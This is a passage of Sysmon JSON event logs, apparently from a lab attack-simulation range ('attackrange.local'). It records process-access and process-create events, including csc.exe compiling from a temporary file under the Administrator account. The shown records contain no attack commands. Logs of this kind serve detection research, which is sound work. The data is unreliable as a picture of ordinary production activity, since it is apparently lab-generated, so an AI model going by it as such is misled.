C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.948\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-00106BC50800}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.948","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-00106BC50800}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.005\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-0010E3C80800}\r\nProcessId: 3080\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESF890.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\CSC91FD94D454AC4396B2242044239C5EF.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-00106BC50800}\r\nParentProcessId: 4292\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.005","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-0010E3C80800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESF890.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\CSC91FD94D454AC4396B2242044239C5EF.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-00106BC50800}","ParentProcessId":"4292","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.cmdline\"","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-00106BC50800}\r\nSourceProcessId: 4292\r\nSourceThreadId: 4800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010E3C80800}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-00106BC50800}","SourceProcessId":"4292","SourceThreadId":"4800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010E3C80800}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010E3C80800}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010E3C80800}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 